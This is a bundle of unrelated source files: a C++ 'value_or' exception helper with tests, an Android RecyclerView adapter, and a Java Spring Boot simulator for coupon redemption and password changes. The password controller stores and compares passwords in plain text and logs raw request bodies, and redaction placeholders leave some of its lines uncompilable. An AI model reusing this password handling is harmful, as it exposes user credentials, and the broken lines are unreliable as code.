Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
template< typename Texception >
class ifstream_or : public std::ifstream
{
public:
ifstream_or<Texception>( const char *_Filename,
ios_base::openmode _Mode = std::ios_base::in,
int _Prot = (int)std::ios_base::_Openprot )
:
std::ifstream( _Filename, _Mode, _Prot )
{
if( ! is_open() )
throw Texception();
}
};
void fstream_or_file_types()
{
Scenario( "File Types - ifstream_or" );
struct BadFile1 {};
struct BadFile2 {};
try
{
ifstream_or<BadFile1> fin1( "value_or_example.cpp" );
Good( "Exception not thrown" );
ifstream_or<BadFile2> fin2( "non-existent file" );
Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
namespace valueor {
template< typename T >
struct value_or_validator< const std::optional<T> & >
{
static bool is_valid( const std::optional<T> & v ) { return v.has_value(); }
};
}
void std_optional_types()
{
Scenario( "std::optional" );
struct BadOption1 {};
struct BadOption2 {};
try
{
auto optional1 = std::optional<int>( 1 );
int i1 = value_or<BadOption1>( optional1 );
Good( "Exception not thrown" );
auto optional2 = std::optional<int>();
int i2 = value_or<BadOption2>( optional2 );
Bad( "Exception should have thrown" );
}
catch( const BadOption1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadOption2 & )
{
Good( "Exception thrown" );
}
}
template< class T >
struct Fault { int error_code; }; // Fault might contain data relevant to the problem
void templated_throws()
{
Scenario( "Templated Throws" );
struct Pointer1 {}; // These route the error handling
struct Pointer2 {};
try
{
int i = 0;
int * p_i = value_or<Fault<Pointer1>>( &i );
Good( "Exception should not thrown" );
p_i = value_or<Fault<Pointer2>>( (int*)0 );
Bad( "Exception should have thrown" );
}
catch( const Fault<Pointer1> & )
{
Bad( "Exception thrown" );
}
catch( const Fault<Pointer2> & )
{
Good( "Exception thrown" );
}
}
int main()
{
pointer_types();
unknown_types();
fopen_file_types();
fstream_file_types();
fstream_or_file_types();
std_optional_types();
templated_throws();
}
<file_sep>/include/value_or/value_or.h
//----------------------------------------------------------------------------
// Licensed under the MIT/X11 license - https://opensource.org/licenses/MIT
//----
// Copyright (c) 2018, Codalogic Ltd (http://www.codalogic.com)
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
// DEALINGS IN THE SOFTWARE.
//----------------------------------------------------------------------------
#ifndef CODALOGIC_VALUE_OR
#define CODALOGIC_VALUE_OR
#include <optional>
namespace valueor {
//----------------------------------------------------------------------------
// The default validators
//----------------------------------------------------------------------------
template< typename Tvalue >
struct value_or_validator
{
static bool is_valid( const Tvalue & v ) { return false; }
};
template< typename Tvalue >
struct value_or_validator< Tvalue * >
{
static bool is_valid( const Tvalue * const p_v ) { return p_v; }
};
//----------------------------------------------------------------------------
// The functions
//----------------------------------------------------------------------------
template < typename Texception, typename Tvalue >
const Tvalue & value_or( const Tvalue & v )
{
if( ! value_or_validator<const Tvalue &>::is_valid( v ) )
throw Texception();
return v;
}
template < typename Texception, typename Tvalue >
Tvalue & value_or( Tvalue & v )
{
if( ! value_or_validator<const Tvalue &>::is_valid( v ) )
throw Texception();
return v;
}
template < typename Texception, typename Tvalue >
const Tvalue * value_or( const Tvalue * p_v )
{
if( ! value_or_validator<const Tvalue *>::is_valid( p_v ) )
throw Texception();
return p_v;
}
template < typename Texception, typename Tvalue >
Tvalue * value_or( Tvalue * p_v )
{
if( ! value_or_validator<const Tvalue *>::is_valid( p_v ) )
throw Texception();
return p_v;
}
template < typename Texception, typename Tvalue >
const Tvalue & value_or( const std::optional<Tvalue> & v )
{
if( ! v.has_value() )
throw Texception();
return v.value();
}
template < typename Texception, typename Tvalue >
Tvalue & value_or( std::optional<Tvalue> & v )
{
if( ! v.has_value() )
throw Texception();
return v.value();
}
//template < typename Texception >
//int * value_or( int * p_v )
//{
// if( ! value_or_validator<int *>::is_valid( p_v ) )
// throw Texception();
// return p_v;
//}
} // End of namespace valueor
#endif // CODALOGIC_VALUE_OR
<file_sep>/README.md
# value_or
An experiment in combining error code returns with exceptions
|
1742f6abd2841e94e1558514742f49d08eee0fa9
|
[
"Markdown",
"C++"
] | 3 |
C++
|
codalogic/value_or
|
e248d4d1573f3f66b85780c3a1046431baa59ffb
|
56f8da6f70cb560a0c52d57104484f35e9a85fed
|
refs/heads/master
|
<repo_name>jsouza678/RecyclaJogo<file_sep>/app/src/main/java/souza/home/com/recyclajogo/GameAdapter.java
package souza.home.com.recyclajogo;
import android.support.v7.widget.RecyclerView;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import java.util.List;
/**
* Created by JoaoSouza on 25/01/19.
*/
public class GameAdapter extends RecyclerView.Adapter<GameAdapter.GameViewHolder> {
private List<Game> gamesList;
public GameAdapter(List<Game> gamesList){
this.gamesList = gamesList;
}
@Override
public GameViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
View itemView = LayoutInflater.from(parent.getContext())
.inflate(R.layout.game_item_row, parent, false);
return new GameViewHolder(itemView);
}
@Override
public void onBindViewHolder(GameViewHolder holder, int position) {
holder.id.setText(gamesList.get(position).getId());
holder.nome.setText(gamesList.get(position).getNome());
}
@Override
public int getItemCount() {
return gamesList.size();
}
public class GameViewHolder extends RecyclerView.ViewHolder{
private TextView id;
private TextView nome;
public GameViewHolder(View view){
super(view);
id = (TextView)view.findViewById(R.id.id);
nome = (TextView)view.findViewById(R.id.nome);
}
}
}
|
43d92aab57b93fc34265498efac7a0f7e8ec892b
|
[
"Java"
] | 1 |
Java
|
jsouza678/RecyclaJogo
|
dafb1a8a363bc4c60e872d4b992b0a8fbb11e1dd
|
bcadf4960a1fe2ab9fc52aa0811956c688471d05
|
refs/heads/master
|
<file_sep>package com.simulator.http.controller.update;
import java.text.SimpleDateFormat;
import java.util.Date;
import org.jboss.logging.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
import com.simulator.common.CommonConst;
import com.simulator.common.CommonUtil;
import com.simulator.common.RSAEncryptor;
import com.simulator.dataservice.Service.LoginMngmtService;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.telegram.if42.RequestTeleIF42Dto;
import com.simulator.telegram.if42.ResponseTeleIF41Dto;
@RestController
@RequestMapping()
@Validated
public class UpdateController {
private static final Logger log = Logger.getLogger(UpdateController.class);
@Autowired
private LoginMngmtService loginMngmtService;
/** パスワード更新制御フラグ:1異常 */
private static String FAULT = "1";
/** パスワード更新制御フラグ:通信エラー408 */
private static String STS_408 = "2";
/** パスワード更新制御フラグ:通信エラー504 */
private static String STS_504 = "3";
/** パスワード更新制御フラグ:通信エラー504 */
private static String STS_400 = "4";
@RequestMapping(value = CommonConst.UPDATE, method = {
RequestMethod.POST }, consumes = MediaType.APPLICATION_JSON_VALUE)
public String runUpdate(@Validated @RequestBody String strBody) {
log.info("パスワード変更処理を開始");
log.info("パスワード変更要求電文:" + strBody);
// 初期化
ResponseTeleIF41Dto if41Dto = new ResponseTeleIF41Dto();
String responseStr = "";
// 受信電文をParse
RequestTeleIF42Dto if42Dto = CommonUtil.jsonConvertObject(strBody, RequestTeleIF42Dto.class);
// 受信電文Parse結果NULLの場合、ステータスコード400を返却
if (if42Dto == null) {
throw new HttpStatus400Exception();
}
// ログインユーザ情報を取得する。
LoginMngmtEntity loginInfo = loginMngmtService.findByPk(if42Dto.getTerminalLoginId());
// ログインユーザIDの検索結果、0の場合
if (loginInfo == null) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300001");
if41Dto.setErrorMessage("ご利用出来ないログインIDです。\nもう一度ご確認お願いします。");
} else {
// パスワード更新処理制御フラグを設定
String updateFlg = loginInfo.getUpdateControl();
if (STS_408.equals(updateFlg)) {
throw new HttpStatus408Exception();
} else if (STS_504.equals(updateFlg)) {
throw new HttpStatus504Exception();
} else if (STS_400.equals(updateFlg)) {
throw new HttpStatus400Exception();
} else {
// パスワード変更可否を判定する
if (FAULT.equals(updateFlg)) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300001");
if41Dto.setErrorMessage("本サービスはご利用頂けません。");
} else {
// ログインパスワードとNEWパスワードを設定
String requestPassword = <PASSWORD>.<PASSWORD>();
String newPassword = <PASSWORD>.getNewPassword();
/** ▼受信パスワードの復号化 ▼**/
requestPassword = RSAEncryptor.decrypt(requestPassword);
newPassword = RSAEncryptor.decrypt(newPassword);
/** ▲受信パスワードの復号化 ▲**/
// ログインパスワードを設定
String password = loginInfo.getLoginPass();
// 現在のパスワードチェックOK
if (password.equals(requestPassword)) {
if (password.equals(newPassword)) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300003");
if41Dto.setErrorMessage("現在のパスワードと変更パスワードが同じです。");
} else {
/** ▼パスワードを更新▼**/
LoginMngmtEntity updateInfo = new LoginMngmtEntity();
updateInfo.setTerminalLoginId(if42Dto.getTerminalLoginId());
updateInfo.setLoginPass(<PASSWORD>);
loginMngmtService.updateLoginPassByPK(updateInfo);
/** ▲パスワードを更新▲**/
// 応答電文.処理結果コード=0正常
if41Dto.setResultCode(0);
}
// 現在のパスワードチェックNG
} else {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300002");
if41Dto.setErrorMessage("ログインパスワードが間違いました。");
}
}
}
}
// 応答電文項目.処理日時を設定
String time = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
if41Dto.setTime(time);
// 応答電文をJSON文字列に変換
responseStr = CommonUtil.convertJson(if41Dto);
log.info("パスワード変更応答電文:" + responseStr);
log.info("パスワード変更処理を終了");
// 応答電文返却
return responseStr;
}
@ResponseStatus(value = HttpStatus.REQUEST_TIMEOUT)
private class HttpStatus408Exception extends RuntimeException {
private static final long serialVersionUID = 4622535996824077793L;
}
@ResponseStatus(value = HttpStatus.GATEWAY_TIMEOUT)
private class HttpStatus504Exception extends RuntimeException {
private static final long serialVersionUID = 1372311004528494096L;
}
@ResponseStatus(value = HttpStatus.BAD_REQUEST)
private class HttpStatus400Exception extends RuntimeException {
private static final long serialVersionUID = 2430747116965743847L;
}
@ResponseStatus(value = HttpStatus.INTERNAL_SERVER_ERROR)
private class HttpStatus500Exception extends RuntimeException {
private static final long serialVersionUID = -4041777557110386908L;
}
}
<file_sep>package com.simulator;
import org.mybatis.spring.annotation.MapperScan;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.web.servlet.ServletComponentScan;
import org.springframework.data.jpa.repository.config.EnableJpaRepositories;
@SpringBootApplication
@EnableJpaRepositories(basePackages = "com.simulator.dataservice.repository")
@ServletComponentScan
@MapperScan("com.simulator.dataservice")
public class SimulatorApplication {
public static void main(String[] args) {
SpringApplication.run(SimulatorApplication.class, args);
}
}
<file_sep>package com.simulator.http.controller.use;
import java.text.SimpleDateFormat;
import java.util.Date;
import org.jboss.logging.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
import com.simulator.common.CommonConst;
import com.simulator.common.CommonUtil;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.Service.LoginMngmtService;
import com.simulator.dataservice.Service.TradeInfoService;
import com.simulator.dataservice.Service.TradeSeqService;
import com.simulator.dataservice.entity.CouponInfoEntity;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.dataservice.entity.TradeInfoEntity;
import com.simulator.telegram.if30.RequestTeleIF30Dto;
import com.simulator.telegram.if30.ResponseTeleIF29Dto;
import com.simulator.telegram.if30.TeleIF29DataDto;
@RestController
@RequestMapping()
@Validated
public class UseController {
private static final Logger log = Logger.getLogger(UseController.class);
@Autowired
private CouponInfoService couponInfoService;
@Autowired
private LoginMngmtService loginMngmtService;
@Autowired
private TradeSeqService tradeSeqService;
@Autowired
private TradeInfoService tradeInfoService;
/** 消込あり:1*/
private static final String USED_FLG_1 = "1";
/** 消込なし:0*/
private static final String USED_FLG_0 = "0";
/** 1:消込確認異常 */
private static final String USE_CONFIRM_FAULT = "1";
/** 2:消込確認 408*/
private static final String USE_CONFIRM_408 = "2";
/** 3:消込確認 504*/
private static final String USE_CONFIRM_504 = "3";
/** 4:消込確認 400*/
private static final String USE_CONFIRM_400 = "4";
/** 1:消込異常 */
private static final String USE_FAULT = "1";
/** 2:消込 408*/
private static final String USE_408 = "2";
/** 3:消込 504*/
private static final String USE_504 = "3";
/** 4:消込 400*/
private static final String USE_400 = "4";
/**画面金額入力有無制御フラグ:"0"無*/
private static String KINGK_EXIST_FLG_OFF = "0";
/**インセンティブ提供方法:"2"ギフト*/
private static String GIFT = "2";
/**取引制御フラグ:"4"未達*/
private static String UNACHIEVED = "4";
@RequestMapping(value = CommonConst.USE, method = {
RequestMethod.POST }, consumes = MediaType.APPLICATION_JSON_VALUE)
public String runUse(@Validated @RequestBody String strBody) {
log.info("クーポン消込処理を開始");
log.info("クーポン消込要求電文:" + strBody);
// 初期化
ResponseTeleIF29Dto if29Dto = new ResponseTeleIF29Dto();
String responseStr = "";
// 受信電文Parse
RequestTeleIF30Dto if30Dto = CommonUtil.jsonConvertObject(strBody, RequestTeleIF30Dto.class);
// 受信電文Parse結果NULLの場合、ステータスコード400を返却
if (if30Dto == null) {
throw new HttpStatus400Exception();
}
// クーポンユーザ情報を取得
LoginMngmtEntity loginInfo = loginMngmtService.findByPk(if30Dto.getTerminalLoginId());
//クーポンユーザ情報の検索結果、0の場合
if (loginInfo == null) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100003");
if29Dto.setErrorMessage("利用できないクーポンです。");
} else {
// 利用業務処理結果制御フラグを判定
// 通信エラー408
if ((USE_CONFIRM_408.equals(loginInfo.getUseOffControl()) && USED_FLG_0.equals(if30Dto.getCouponUsedFlg()))
|| (USE_408.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus408Exception();
// 通信エラー504
} else if (USE_CONFIRM_504.equals(loginInfo.getUseOffControl())
&& USED_FLG_0.equals(if30Dto.getCouponUsedFlg())
|| (USE_504.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus504Exception();
// 通信エラー400
} else if (USE_CONFIRM_400.equals(loginInfo.getUseOffControl())
&& USED_FLG_0.equals(if30Dto.getCouponUsedFlg())
|| (USE_400.equals(loginInfo.getUseOnControl())
&&
USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus400Exception();
// 消込確認異常
} else if (USE_CONFIRM_FAULT.equals(loginInfo.getUseOffControl())
&& USED_FLG_0.equals(if30Dto.getCouponUsedFlg())) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100004");
if29Dto.setErrorMessage("本クーポンはご利用頂けません。");
// 消込異常
} else if (USE_FAULT.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg())) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100005");
if29Dto.setErrorMessage("本クーポンはご利用頂けません。");
} else {
// クーポンユーザ情報を取得
CouponInfoEntity couponInfo = couponInfoService
.findOne(if30Dto.getPartnerCompUserID());
// クーポン情報取得0件の場合
if (couponInfo == null) {
log.error("クーポン属性テーブルから情報取得出来ません。");
log.error("キャンペーンIDと紐づく情報がありません。");
throw new HttpStatus500Exception();
} else if (Double.valueOf(if30Dto.getTransactionKingk()) > couponInfo.getBalance()) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100006");
if29Dto.setErrorMessage("ご利用可能額を超えています。再度ご確認お願いします。");
} else {
TeleIF29DataDto data = new TeleIF29DataDto();
// クーポン消込ありの場合
if (USED_FLG_1.equals(if30Dto.getCouponUsedFlg())) {
data = couponUseProssecing(couponInfo, if30Dto);
} else {
data = couponConfirmUseProssecing(couponInfo, if30Dto);
}
if29Dto.setData(data);
// 処理結果コード0正常を設定
if29Dto.setResultCode(0);
// 取引制御フラグが未達の場合
if (UNACHIEVED.equals(couponInfo.getRegistCancelDivision())) {
if29Dto.setErrorCode("I00006");
if29Dto.setErrorMessage("未達エラーメッセージ");
}
}
}
}
// 応答電文項目.処理日時を設定
String time = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
if29Dto.setTime(time);
// 応答電文をJSON文字列に変換
responseStr = CommonUtil.convertJson(if29Dto);
log.info("クーポン消込応答電文:" + responseStr);
log.info("クーポン消込処理を終了");
// 応答電文返却
return responseStr;
}
/**クーポン消込なしの応答電文作成処理
* @parameter CouponUserInfoBean
* @parameter CouponPrptyBean
* @parameter RequestTeleIF30Dto
* @return TeleIF29DataDto
* */
private TeleIF29DataDto couponConfirmUseProssecing(final CouponInfoEntity couponInfo,
final RequestTeleIF30Dto if30Dto) {
// 応答電文データ部の初期化
TeleIF29DataDto if29Data = new TeleIF29DataDto();
// 金額入力なしの場合
if (KINGK_EXIST_FLG_OFF.equals(couponInfo.getKingkExistFlg())) {
// ギフトの場合
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0);
if29Data.setDiscountKingk((double) 0);
// ギフト以外の場合
} else if (Integer.valueOf(if30Dto.getTransactionKingk()) == 0){
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0 - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
} else {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
// 金額入力ありの場合
} else {
if29Data.setTransactionKingk(Double.valueOf(if30Dto.getTransactionKingk()));
if29Data.setAfterDiscountKingk( Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
// ギフトの場合
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setDiscountKingk((double) 0);
// ギフト以外の場合
} else {
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
}
return if29Data;
}
/**
* クーポン消込ありの応答電文作成処理
* @parameter CouponUserInfoBean
* @parameter CouponPrptyBean
* @parameter RequestTeleIF30Dto
* @return TeleIF29DataDto
* */
private TeleIF29DataDto couponUseProssecing(final CouponInfoEntity couponInfo,
final RequestTeleIF30Dto if30Dto) {
// 応答電文データ部の初期化
TeleIF29DataDto if29Data = new TeleIF29DataDto();
// 現在の日時を取得
Date date = new Date();
/** ▼トランザクションIDを生成▼**/
SimpleDateFormat simpleDateFormat = new SimpleDateFormat("yyyyMMdd");
String strDate = simpleDateFormat.format(date);
String transactionID = strDate.concat(tradeSeqService.getSeq());
/** ▲トランザクションIDを生成▲**/
/** ▼キャンペン利用日時を設定▼**/
SimpleDateFormat simpleDate = new SimpleDateFormat("yyyyMMddHHmmss");
String campaignUseDatetime = simpleDate.format(date);
/** ▲キャンペン利用日時を設定▲**/
// 金額入力なしの場合
if (KINGK_EXIST_FLG_OFF.equals(couponInfo.getKingkExistFlg())) {
// ギフトの場合
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0);
if29Data.setDiscountKingk((double) 0);
// ギフト以外の場合
} else if (Integer.valueOf(if30Dto.getTransactionKingk()) == 0){
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0 - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
} else {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
// 金額入力ありの場合
} else {
if29Data.setTransactionKingk(Double.valueOf(if30Dto.getTransactionKingk()));
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
// ギフトの場合
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setDiscountKingk((double) 0);
// ギフト以外の場合
} else {
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
}
/**▼クーポン残利用回数を計算▼**/
String couponRemainUseNum = "";
if (couponInfo.getCouponRemainUseNum() < 0) {
couponRemainUseNum = "-1";
} else {
couponRemainUseNum = String.valueOf(couponInfo.getCouponRemainUseNum() - 1);
}
if29Data.setCouponRemainUseNum(couponRemainUseNum);
/**▲クーポン残利用回数を計算▲**/
if29Data.setTransactionID(transactionID);
if29Data.setCampaignUseDatetime(campaignUseDatetime);
if29Data.setPartnerCompUserID(couponInfo.getPartnerCompUserId());
/**▼取引情報をDBに反映▼**/
TradeInfoEntity tradeInfoInser = new TradeInfoEntity();
tradeInfoInser.setTransactionId(transactionID);
tradeInfoInser.setPartnerCompUserId(if29Data.getPartnerCompUserID());
tradeInfoInser.setTransactionKingk(if29Data.getTransactionKingk());
tradeInfoInser.setAfterDiscountKingk(if29Data.getAfterDiscountKingk());
tradeInfoInser.setDiscountKingk(if29Data.getDiscountKingk());
tradeInfoInser.setIncentiveOfferType(couponInfo.getIncentiveOfferType());
tradeInfoInser.setCampaignName(couponInfo.getCampaignName());
tradeInfoInser.setCampaignComment(couponInfo.getCampaignComment());
tradeInfoInser.setRegistCancelDivision(couponInfo.getRegistCancelDivision());
tradeInfoInser.setStatus("0");
tradeInfoInser.setTerminalLoinId(if30Dto.getTerminalLoginId());
tradeInfoInser.setCouponRemainUseNum(couponRemainUseNum);
tradeInfoService.insertByValue(tradeInfoInser);
/**▲取引情報をDBに反映▲**/
/**▼クーポン残高情報をDBに反映▼**/
Double balance = couponInfo.getBalance() - couponInfo.getDiscountKingk();
couponInfo.setBalance(balance);
couponInfo.setCouponRemainUseNum(Integer.valueOf(couponRemainUseNum));
couponInfoService.save(couponInfo);
/**▲クーポン残高情報をDBに反映▲**/
return if29Data;
}
@ResponseStatus(value = HttpStatus.REQUEST_TIMEOUT)
private class HttpStatus408Exception extends RuntimeException {
private static final long serialVersionUID = 3303072281551296489L;
}
@ResponseStatus(value = HttpStatus.GATEWAY_TIMEOUT)
private class HttpStatus504Exception extends RuntimeException {
private static final long serialVersionUID = 7604508793140677611L;
}
@ResponseStatus(value = HttpStatus.BAD_REQUEST)
private class HttpStatus400Exception extends RuntimeException {
private static final long serialVersionUID = 2217588269501541903L;
}
@ResponseStatus(value = HttpStatus.INTERNAL_SERVER_ERROR)
private class HttpStatus500Exception extends RuntimeException {
private static final long serialVersionUID = 1300406671277144724L;
}
}
<file_sep>/*
* ファイル名 TeleIF21DataDto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/20
* 作成者 NJK 戦彦鵬
* 履歴情報
* 2018/03/20 NJK 戦彦鵬 初版作成
*/
package com.simulator.telegram.if22;
import java.io.Serializable;
/**
* IF21_クーポン利用確認情報応答DTO(Data部).
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class TeleIF21DataDto implements Serializable {
/**
* シリアルバージョンUID.
*/
private static final long serialVersionUID = 7264749228299698705L;
/**
* キャンペーンID.
*/
private String campaignID = "";
/**
* キャンペーン名称.
*/
private String campaignName = "";
/**
* キャンペーン説明文.
*/
private String campaignComment = "";
/**
* インセンティブ提供方法.
*/
private String incentiveOfferType = "";
/**
* 金額入力設定有無.
*/
private String kingkExistFlg = "";
/**
* 最低金額.
*/
private String targetKingkMin = "";
/**
* 提携先ユーザID.
*/
private String partnerCompUserID = "";
/**
* キャンペーンIDの取得.
*
* @return campaignID キャンペーンID
*/
public final String getCampaignID() {
return campaignID;
}
/**
* キャンペーンIDの設定
*
* @param campaignID
* キャンペーンID
*/
public final void setCampaignID(final String campaignID) {
this.campaignID = campaignID;
}
/**
* キャンペーン名称の取得.
*
* @return campaignName キャンペーン名称
*/
public final String getCampaignName() {
return campaignName;
}
/**
* キャンペーン名称の設定
*
* @param campaignName
* キャンペーン名称
*/
public final void setCampaignName(final String campaignName) {
this.campaignName = campaignName;
}
/**
* キャンペーン説明文の取得.
*
* @return campaignComment キャンペーン説明文
*/
public final String getCampaignComment() {
return campaignComment;
}
/**
* キャンペーン説明文の設定
*
* @param campaignComment
* キャンペーン説明文
*/
public final void setCampaignComment(final String campaignComment) {
this.campaignComment = campaignComment;
}
/**
* インセンティブ提供方法の取得.
*
* @return incentiveOfferType インセンティブ提供方法
*/
public final String getIncentiveOfferType() {
return incentiveOfferType;
}
/**
* インセンティブ提供方法の設定
*
* @param incentiveOfferType
* インセンティブ提供方法
*/
public final void setIncentiveOfferType(final String incentiveOfferType) {
this.incentiveOfferType = incentiveOfferType;
}
/**
* 金額入力設定有無の取得.
*
* @return kingkExistFlg 金額入力設定有無
*/
public final String getKingkExistFlg() {
return kingkExistFlg;
}
/**
* 金額入力設定有無の設定
*
* @param kingkExistFlg
* 金額入力設定有無
*/
public final void setKingkExistFlg(final String kingkExistFlg) {
this.kingkExistFlg = kingkExistFlg;
}
/**
* 最低金額の取得.
*
* @return targetKingkMin 最低金額
*/
public final String getTargetKingkMin() {
return targetKingkMin;
}
/**
* 最低金額の設定
*
* @param targetKingkMin
* 最低金額
*/
public final void setTargetKingkMin(final String targetKingkMin) {
this.targetKingkMin = targetKingkMin;
}
/**
* 提携先ユーザIDの取得.
*
* @return partnerCompUserID 提携先ユーザID
*/
public final String getPartnerCompUserID() {
return partnerCompUserID;
}
/**
* 提携先ユーザIDの設定
*
* @param partnerCompUserID
* 提携先ユーザID
*/
public final void setPartnerCompUserID(final String partnerCompUserID) {
this.partnerCompUserID = partnerCompUserID;
}
/**
* オブジェクトの文字列表現を返す.
*
* @return オブジェクトの文字列表現
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("campaignID=");
builder.append(getCampaignID());
builder.append(",campaignName=");
builder.append(getCampaignName());
builder.append(",campaignComment=");
builder.append(getCampaignComment());
builder.append(",incentiveOfferType=");
builder.append(getIncentiveOfferType());
builder.append(",kingkExistFlg=");
builder.append(getKingkExistFlg());
builder.append(",targetKingkMin=");
builder.append(getTargetKingkMin());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* ファイル名 ResponseTeleHeaderDto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/16
* 作成者 NJK 戦彦鵬
* 履歴情報
* 2018/03/16 NJK 戦彦鵬 初版作成
*/
package com.simulator.telegram;
import java.io.Serializable;
/**
* 配信情報の共通ヘッダDTO.
*
* @author NJK
* @version 1.0 2018/03/16
*/
public class ResponseTeleHeaderDto implements Serializable {
/**
*シリアルバージョンUID.
*/
private static final long serialVersionUID = -7992225098910748173L;
/**
* 処理日時.
*/
private String time = "";
/**
* 処理結果.
*/
private Integer resultCode = null;
/**
* エラーコード.
*/
private String errorCode = "";
/**
* 処理日時の取得.
*
* @return time 処理日時
*/
public final String getTime() {
return time;
}
/**
* 処理日時の設定
*
* @param time
* 処理日時
*/
public final void setTime(final String time) {
this.time = time;
}
/**
* 処理結果の取得.
*
* @return resultCode 処理結果
*/
public final Integer getResultCode() {
return resultCode;
}
/**
* 処理結果の設定
*
* @param resultCode
* 処理結果
*/
public final void setResultCode(final Integer resultCode) {
this.resultCode = resultCode;
}
/**
* エラーコードの取得.
*
* @return errorCode エラーコード
*/
public final String getErrorCode() {
return errorCode;
}
/**
* エラーコードの設定
*
* @param errorCode
* エラーコード
*/
public final void setErrorCode(final String errorCode) {
this.errorCode = errorCode;
}
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("time:").append(getTime());
builder.append(", resultCode:").append(getResultCode());
builder.append(", errorCode:").append(getErrorCode());
return builder.toString();
}
}
<file_sep>package com.simulator.dataservice.Service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.simulator.dataservice.entity.TradeInfoEntity;
import com.simulator.dataservice.mapper.TradeInfoMapMapper;
